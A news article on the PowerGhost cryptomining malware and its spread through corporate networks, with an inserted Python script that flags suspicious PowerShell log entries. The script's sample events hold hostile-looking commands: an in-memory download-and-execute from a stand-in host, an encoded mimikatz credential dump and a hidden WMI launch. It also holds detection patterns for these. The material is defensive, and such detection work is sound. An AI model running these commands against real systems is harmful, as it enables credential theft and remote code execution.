This new cryptomining malware targets business PCs and servers

Researchers have uncovered a cryptojacking campaign that looks to spread across infected networks to ensure as much mining profit as possible.
Written by Danny Palmer, Senior Writer


A new form of cryptocurrency-mining malware is targeting corporate networks across the world, employing a combination of PowerShell and EternalBlue to stealthily spread.

Dubbed PowerGhost, the fileless malware can secretly embed itself on a single system on a network then spread to other PCs and servers across organisations.

The cryptojacker has been uncovered by researchers at security company Kaspersky Lab, who detected it on corporate networks across the globe, with the largest concentration of infections in India, Brazil, Colombia, and Turkey. PowerGhost has also been detected across Europe and North America.

Cryptocurrency mining malware secretly uses the power of infected systems to mine for cryptocurrency, which is sent to the attackers' wallet. The more machines that are infected, the more illicit profits the attackers can make.

Infections begin with the use of exploits or remote administration tools such as Windows Management Instrumentation. PowerGhost also uses fileless techniques to discreetly go about its business and ensure it isn't detected on the network.

By adopting this tactic, the PowerGhost miner isn't stored directly on the hard drive of the infected machine, making it harder to detect.

PowerGhost itself is an obfuscated PowerShell script which contains add-on modules for the miner's operation such as mimikatz, which helps it obtain account credentials of infected machines, as well as a shellcode for deploying the notorious EternalBlue exploit to spread around the network.
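The fileless, obfuscated-PowerShell design described above is what PowerShell script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) exists to surface: the script text is recorded at execution time even when nothing is written to disk. The following is an added example, not code from the article or from Kaspersky Lab, showing how a defender might triage such records. It scores constructed, made-up script block texts (not real PowerGhost samples) with simple heuristics: decoding `-EncodedCommand` payloads, matching indicators such as credential-dumping tool names, download-and-execute patterns, WMI process creation and `[char]`-based string construction, and measuring character entropy. The event records, indicator list, weights and threshold are all assumptions chosen for this illustration.

```python
import base64
import math
import re
from collections import Counter

# Constructed records in the shape of Event ID 4104 script block logging.
# These are invented for the walkthrough, not real PowerGhost artefacts.
SAMPLE_EVENTS = [
    {"id": 1, "ScriptBlockText": "Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB }"},
    {"id": 2, "ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"},
    {"id": 3, "ScriptBlockText": "powershell -nop -w hidden -enc "
        + base64.b64encode("Invoke-Mimikatz -DumpCreds".encode("utf-16le")).decode()},
    {"id": 4, "ScriptBlockText": "$s=([char]73+[char]69+[char]88);&$s 'Write-Host hi'"},
    {"id": 5, "ScriptBlockText": "Invoke-WmiMethod -Class Win32_Process -Name Create "
        "-ArgumentList 'powershell -nop -w hidden -c ...'"},
]

# (regex over lowercased text, weight, label) -- assumed heuristics, not a vendor signature set
INDICATORS = [
    (r"invoke-mimikatz|dumpcreds|sekurlsa", 5, "credential dumping tool reference"),
    (r"\b(iex|invoke-expression)\b.*(downloadstring|downloadfile|webclient)", 5, "download-and-execute in memory"),
    (r"win32_process.*create|invoke-wmimethod|invoke-cimmethod", 3, "WMI process creation"),
    (r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile", 2, "hidden window / no-profile launch flags"),
    (r"(\[char\]\d+\s*\+?\s*){3,}", 5, "char-code string construction (obfuscation)"),
    (r"reflectivepeinjection|virtualalloc|\[runtime\.interopservices\.marshal\]", 4, "in-memory PE/shellcode loading"),
]

# PowerShell accepts abbreviated -EncodedCommand; the payload is base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
FLAG_THRESHOLD = 5  # assumed cut-off for this illustration


def shannon_entropy(text):
    """Bits per character; obfuscated or base64-heavy script text scores higher than plain code."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def decode_encoded_command(text):
    """Return every decodable -EncodedCommand payload in the script block as plain text."""
    decoded = []
    for match in ENCODED_RE.finditer(text):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not a real encoded command; ignore
    return decoded


def analyze_script_block(text):
    """Score one script block; returns (score, list of human-readable reasons)."""
    score, reasons = 0, []
    views = [text] + decode_encoded_command(text)  # inspect both the wrapper and its payload
    if len(views) > 1:
        score += 2
        reasons.append("base64 -EncodedCommand payload")
    for view in views:
        lowered = view.lower()
        for pattern, weight, label in INDICATORS:
            if label not in reasons and re.search(pattern, lowered):
                score += weight
                reasons.append(label)
    entropy = shannon_entropy(text)
    if len(text) >= 64 and entropy > 5.2:
        score += 2
        reasons.append(f"high entropy ({entropy:.2f} bits/char)")
    return score, reasons


def triage(events):
    """Return [(event id, score, reasons)] for records at or above the threshold, highest first."""
    hits = []
    for event in events:
        score, reasons = analyze_script_block(event["ScriptBlockText"])
        if score >= FLAG_THRESHOLD:
            hits.append((event["id"], score, reasons))
    return sorted(hits, key=lambda hit: -hit[1])


if __name__ == "__main__":
    for event_id, score, reasons in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: score {score}: " + "; ".join(reasons))
```

In practice the records would come from an exported event log or a SIEM query rather than an inline list, and the indicator weights would be tuned against the organisation's own baseline of legitimate administrative scripts; the point is that script block logging defeats the "nothing on disk" property the malware relies on, so the analysis can run on what was actually executed.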


EternalBlue is the leaked NSA hacking tool which went on to power the WannaCry and NotPetya attacks, and it's still being used by crooks over a year later.

After one machine is infected with PowerGhost, EternalBlue can spread it to the rest of the network; with the aid of mimikatz it can then steal credentials, aiding its spread, and escalate privileges using CVE-2018-8120.

Once PowerGhost is embedded onto machines, it can perform its task of mining for cryptocurrency -- and detection rates for the malware suggest that those behind it are particularly keen to compromise corporate networks in order to make as much money as quickly as possible.

"PowerGhost raises new concerns about crypto-mining software. The miner we examined indicates that targeting consumers is not enough for cybercriminals anymore - threat actors are now turning their attention to enterprises too. Crypto-currency mining is set to become a huge threat to the business community," said David Emm, principal security researcher at Kaspersky Lab.

Researchers note that one version of PowerGhost can also be used for conducting DDoS attacks, something which those behind the malware are likely to be using as an additional means of income.


Cryptocurrency mining malware has risen to become one of the most popular means of cybercriminals making money, even surpassing ransomware when it comes to turning a profit.

To avoid corporate networks falling victim to mining malware, researchers recommend software is kept patched and up to date in order to prevent miners exploiting known vulnerabilities like EternalBlue.

Organisations are also urged not to overlook less obvious targets such as queue management systems, POS terminals, and vending machines: cryptojackers don't need much processing power to operate, so they can easily take advantage of these often-forgotten, low-powered systems.
